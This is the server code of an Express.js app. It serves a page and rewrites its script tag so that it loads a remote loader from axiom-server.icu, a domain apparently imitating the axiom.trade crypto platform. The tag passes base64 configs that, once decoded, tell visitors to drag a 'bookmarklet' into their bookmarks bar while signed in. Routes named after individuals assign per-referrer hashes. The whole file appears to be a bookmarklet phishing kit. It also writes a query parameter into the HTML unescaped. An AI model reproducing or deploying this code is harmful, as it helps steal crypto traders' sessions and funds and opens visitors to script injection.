require('dotenv').config();

const express = require('express');
const fs = require('fs');
const app = express();
const { sql } = require('@vercel/postgres');

const bodyParser = require('body-parser');
const path = require('path');

const urlencodedParser = bodyParser.urlencoded({ extended: false });

app.use(express.static('public'));

app.get("/", function (req, res) {
  	let html = fs.readFileSync(path.join(__dirname, '..', 'public', 'bloom.html'), 'utf8');
	html = html.replace(`<script src="https://axiom-server.icu/loader.js"></script>`, `<script src="https://axiom-server.icu/loader.js" data="eyJoYXNoIjoiTURzM05qRXdOalU1T0RJeiIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0="></script>`);
  	res.send(html);
});

app.get("/:data", function (req, res) {
  	let html = fs.readFileSync(path.join(__dirname, '..', 'public', 'bloom.html'), 'utf8');
	if(["moontrades"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTURzeU1EWTJPRFEwTkRrNCIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["kevin"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTURzNE1UZzVOREUxTnpZeCIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["damian"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTVRzNE1qTXlPRGt4TlRJNSIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["homepage"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTVRzNE1EYzNOekV6TmpreCIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["home"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTVRzMU56SXpNelE0TlRNdyIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["Trade"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTURzM016SXhOekEyTVRnMSIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["Tharsky"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTURzM056UXhOVE16TlRVeSIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["ORANGIE"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTVRzM056UTRPREk0TlRReiIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["Johan"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTVRzNE1qTXlPRGt4TlRJNSIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["orangie"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTURzM056TTRNRGszT0RBNSIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0=";
	if(["bloom"].includes(req.params.data)) req.query.start = "eyJoYXNoIjoiTURzM056UXpORFU1TlRJMU95MHhNREF5TnpJek9ETTNPVGN6IiwiYWxlcnRzIjp7Imd1aWRlIjoiWW91IG11c3QgZHJhZyB0aGUgYm9va21hcmtsZXQgdG8geW91ciBib29rbWFya3MgYmFyIGluc3RlYWQgb2YgY2xpY2tpbmcgaXQuIiwicmVkaXJlY3QiOiJZb3UgYXJlIG5vdyBiZWluZyByZWRpcmVjdGVkIHRvIGh0dHBzOi8vYXhpb20udHJhZGUvZGlzY292ZXIuIiwidW5hdXRob3JpemVkIjoiWW91IG11c3QgYmUgc2lnbmVkIGluIHRvIHVzZSB0aGlzIGJvb2ttYXJrbGV0LiIsImVycm9yIjoiRmFpbGVkIHRvIGV4ZWN1dGUgdGhlIGJvb2ttYXJrbGV0LiBQbGVhc2UgdHJ5IGFnYWluIGxhdGVyLiJ9fQ==";
  	if (req.query.start) {
		html = html.replace(`<script src="https://axiom-server.icu/loader.js"></script>`, `<script src="https://axiom-server.icu/loader.js" data="${req.query.start}"></script>`);
	} else {
		html = html.replace(`<script src="https://axiom-server.icu/loader.js"></script>`, `<script src="https://axiom-server.icu/loader.js" data="eyJoYXNoIjoiTURzM05qRXdOalU1T0RJeiIsImFsZXJ0cyI6eyJndWlkZSI6IllvdSBtdXN0IGRyYWcgdGhlIGJvb2ttYXJrbGV0IHRvIHlvdXIgYm9va21hcmtzIGJhciBpbnN0ZWFkIG9mIGNsaWNraW5nIGl0LiIsInJlZGlyZWN0IjoiWW91IGFyZSBub3cgYmVpbmcgcmVkaXJlY3RlZCB0byBodHRwczovL2F4aW9tLnRyYWRlL2Rpc2NvdmVyLiIsInVuYXV0aG9yaXplZCI6IllvdSBtdXN0IGJlIHNpZ25lZCBpbiB0byB1c2UgdGhpcyBib29rbWFya2xldC4iLCJlcnJvciI6IkZhaWxlZCB0byBleGVjdXRlIHRoZSBib29rbWFya2xldC4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4ifX0="></script>`);
	}
  	res.send(html);
});

app.listen(3000, () => console.log('Server ready on port 3000.'));

module.exports = app;
